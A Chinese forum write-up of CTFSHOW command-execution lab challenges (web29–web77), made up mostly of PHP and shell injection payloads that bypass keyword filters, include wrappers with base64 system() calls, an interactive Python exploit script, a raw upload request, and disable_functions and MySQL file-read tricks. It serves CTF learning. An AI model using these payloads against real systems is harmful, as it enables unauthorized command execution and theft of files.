-
-
[原创]CTFSHOW命令执行WP
-
2021-9-22 17:26 26411
-
CTFSHOW命令执行
web29
过滤了flag
payload:
随便写几个姿势
1 2 3 4 5 6 7 8 | / ?c = system( "nl fl??????" ); / ?c = system( "nl fl*" ); / ?c = system( "nl fla''g.php" ); / ?c = echo `nl fla""g.php`; / ?c = echo `nl fla\g.php`; / ?c = include($_GET[ 1 ]);& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php / ?c = eval ($_GET[ 1 ]);& 1 = system( 'nl flag.php' ); 剩下的我不会了 |
web30
过滤了flag|system|php
用echo 反引号来执行命令
payload:
1 2 3 4 5 | / ?c = echo `nl fla" "g.p" "hp`; / ?c = echo `nl fla?????`; / ?c = echo `nl f * `; / ?c = eval ($_GET[ 1 ]);& 1 = system( 'nl flag.php' ); / ?c = include($_GET[ 1 ]);& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php |
web31
过滤了flag|system|php|cat|sort|shell|\.| |
没关系,我们有都是姿势
payload:
1 2 3 | / ?c = highlight_file( next (array_reverse(scandir(dirname(__FILE__))))); / ?c = include($_GET[ 1 ]);& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php / ?c = show_source( next (array_reverse(scandir(pos(localeconv()))))); |
web32
include不用括号,分号可以用?>代替。
payload:
1 2 3 | / ?c = include$_GET[ 1 ]?>& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php / ?c = include$_GET[ 1 ]?>& 1 = data: / / text / plain,<?php system( "cat flag.php" );?> / ?c = include$_GET[ 1 ]?>& 1 = data: / / text / plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs / Pg = = |
web33-36
payload:
1 2 3 | / ?c = include$_GET[ 1 ]?>& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php / ?c = include$_GET[ 1 ]?>& 1 = data: / / text / plain,<?php system( "cat flag.php" );?> / ?c = include$_GET[ 1 ]?>& 1 = data: / / text / plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs / Pg = = |
web37
1 2 3 4 5 6 7 8 9 10 11 12 | <?php / / flag in flag.php error_reporting( 0 ); if (isset($_GET[ 'c' ])){ $c = $_GET[ 'c' ]; if (!preg_match( "/flag/i" , $c)){ include($c); echo $flag; } } else { highlight_file(__FILE__); } |
payload:
1 2 | / ?c = data: / / text / plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs / Pg = = / ?c = data: / / text / palin,<?php system( "nl fla*" );?> |
web38
过滤了flag
payload:
1 | / ?c = data: / / text / plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs / Pg = = |
web39
payload:
1 | / ?c = data: / / text / palin,<?php % 20system ( "nl%20f*" );?> |
web40-41
理论上是异或
然后我懒
贴exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 | import re content = '' preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/' for i in range ( 256 ): for j in range ( 256 ): if not (re.match(preg, chr (i),re.I) or re.match(preg, chr (j),re.I)): k = i | j if k> = 32 and k< = 126 : a = '%' + hex (i)[ 2 :].zfill( 2 ) b = '%' + hex (j)[ 2 :].zfill( 2 ) content + = ( chr (k) + ' ' + a + ' ' + b + '\n' ) f = open ( 'rce_or.txt' , 'w' ) f.write(content) |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | # -*- coding: utf-8 -*- import requests import urllib from sys import * import os os.system( "php rce_or.php" ) #没有将php写入环境变量需手动运行 if ( len (argv)! = 2 ): print ( "=" * 50 ) print ( 'USER:python exp.py <url>' ) print ( "eg: python exp.py http://ctf.show/" ) print ( "=" * 50 ) exit( 0 ) url = argv[ 1 ] def action(arg): s1 = "" s2 = "" for i in arg: f = open ( "rce_or.txt" , "r" ) while True : t = f.readline() if t = = "": break if t[ 0 ] = = i: #print(i) s1 + = t[ 2 : 5 ] s2 + = t[ 6 : 9 ] break f.close() output = "(\"" + s1 + "\"|\"" + s2 + "\")" return (output) while True : param = action( input ( "\n[+] your function:" ) ) + action( input ( "[+] your command:" )) data = { 'c' :urllib.parse.unquote(param) } r = requests.post(url,data = data) print ( "\n[*] result:\n" + r.text) |
exp取自https://wp.ctf.show/d/137-ctfshow-web-web41/4
web42
/dev/null 2>&1,让所有的输出流(包括错误的和正确的)都定向到空设备丢弃
%0a
、%26
、||
截断
payload:
1 2 3 | / ?c = nl % 20 * % 0a = = 姿势就不写那么多了 截断后看过滤自由发挥 |
web43
过滤了;|cat
payload:
1 | / ?c = nl % 20 * % 0a |
web44
多过滤了个flag
通配符搞定
payload:
1 | / ?c = nl % 20 * % 0a |
web45
空格被过滤了
payload:
1 | / ?c = nl$IFS * % 0a |
web46-49
过滤了\;|cat|flag| |[0-9]|\\$|\*/
payload:
1 2 3 4 5 6 7 8 9 | / ?c = nl % 09fla \g.php|| / ?c = nl % 09fla \g.php % 0a / ?c = nl % 09fla ''g.php % 0a / ?c = nl % 09fla ""g.php % 0a / ?c = vi % 09fla \g.php % 0a / ?c = tac % 09fla \g.php % 0a / ?c = uniq % 09fla \g.php % 0a / ?c = nl<fla''g.php|| / ?c = nl % 09fla \g.php % 26 |
web50-51
payload:
1 | / ?c = nl<fla % 27 % 27g .php|| |
web52
payload:
1 | / ?c = nl${IFS} / fl""ag % 0a |
web53
payload:
1 2 3 4 | / ?c = nl${IFS}fla % ' 'g.p' 'hp / ?c = ca''t${IFS}fl?????? / ?c = ca' 't${IFS}fl' 'ag.p' 'hp 应该还有其他姿势 |
web54
payload:
1 2 3 | / ?c = mv${IFS}fla?.php${IFS}t.tx''t 爷给他改个名 / ?c = / bin / ?at${IFS}f??????? |
web55
= = 只能是数字
对不起骚套路开始
payload:
1 | / ?c = / ??? / ???? 64 + ????.??? |
web56
https://blog.csdn.net/qq_46091464/article/details/108513145
数据包:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | POST / ?c = . + / ??? / ????????[@ - [] HTTP / 1.1 Host: 6595d4e2 - edc5 - 4ff4 - a08b - c93d2f563732.challenge.ctf.show: 8080 Content - Length: 329 Cache - Control: max - age = 0 Upgrade - Insecure - Requests: 1 Origin: null Content - Type : multipart / form - data; boundary = - - - - WebKitFormBoundarydZeuVbMPZVcyvpNM User - Agent: Mozilla / 5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 92.0 . 4515.159 Safari / 537.36 Accept: text / html,application / xhtml + xml,application / xml;q = 0.9 ,image / avif,image / webp,image / apng, * / * ;q = 0.8 ,application / signed - exchange;v = b3;q = 0.9 Accept - Encoding: gzip, deflate Accept - Language: zh - CN,zh;q = 0.9 Connection: close - - - - - - WebKitFormBoundarydZeuVbMPZVcyvpNM Content - Disposition: form - data; name = "file" ; filename = "2.php" Content - Type : application / octet - stream #!/bin/sh cat / var / www / html / flag.php - - - - - - WebKitFormBoundarydZeuVbMPZVcyvpNM Content - Disposition: form - data; name = "submit" 111 - - - - - - WebKitFormBoundarydZeuVbMPZVcyvpNM - - |
web58
凑36
-37取反=36
payload:
1 | $((~$(($((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_})))))))) |
web59
绕过disable_functions
我只想到一种
file
可以把文件读取到一个数组,再打印出来
payload:
1 2 3 | c = var_dump( file ( 'flag.php' )); c = highlight_file( "flag.php" ); c = show_source( 'flag.php' ); |
web60-65
payload:
1 2 | c = highlight_file( "flag.php" ); c = show_source( 'flag.php' ); |
web66
payload:
1 2 3 4 | c = var_dump(scandir( "/" )); 扫描到flag 是txt 然后日他妈的 c = highlight_file( '/flag.txt' ); |
web67-70
= = 好家伙
ban的真多
payload:
1 2 3 | c = include( '/flag.txt' ); c = require( '/flag.txt' ); c = require_once( '/flag.txt' ); |
web71
ob_get_contents — 返回输出缓冲区的内容
ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲
此函数丢弃最顶层输出缓冲区的内容并关闭这个缓冲区。如果想要进一步处理缓冲区的内容,必须在ob_end_clean()之前调用ob_get_contents(),因为当调用ob_end_clean()时缓冲区内容将被丢弃。
https://blog.csdn.net/solitudi/article/details/109837640?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163062881716780269897928%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163062881716780269897928&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-109837640.first_rank_v2_pc_rank_v29&utm_term=y4tacker+%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&spm=1018.2226.3001.4187 y4的blog说的很清楚
payload:
1 | c = include( '/flag.txt' );;exit(); |
web72
看一下y4的blog就可以了= = payload不贴了 太长了。
##web73
1 2 3 4 5 6 | c = ?><?php $a = new DirectoryIterator( "glob:///*" ); foreach($a as $f) {echo($f - >__toString(). ' ' ); } exit( 0 ); ?> |
看一下目录
然后
payload:
1 | c = include( '/flagc.txt' );exit(); |
web74
同73题
web75-76
扫目录
1 | c = $a = new DirectoryIterator( "glob:///*" );foreach($a as $f){echo($f - >__toString(). ' ' );}exit( 0 ); |
mysql load_file读文件
1 2 3 4 | c = try {$dbh = new PDO( 'mysql:host=localhost;dbname=ctftraining' , 'root' , 'root' );foreach($dbh - >query( 'select load_file("/flag36.txt")' ) as $row) {echo($row[ 0 ]). "|" ; }$dbh = null;}catch (PDOException $e) {echo $e - >getMessage();exit( 0 );}exit( 0 ); |
web77
不是很清楚这个题怎么做
但是我复现了一下
https://www.laruence.com/2020/03/11/5475.html
https://blog.csdn.net/miuzzx/article/details/108619930
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法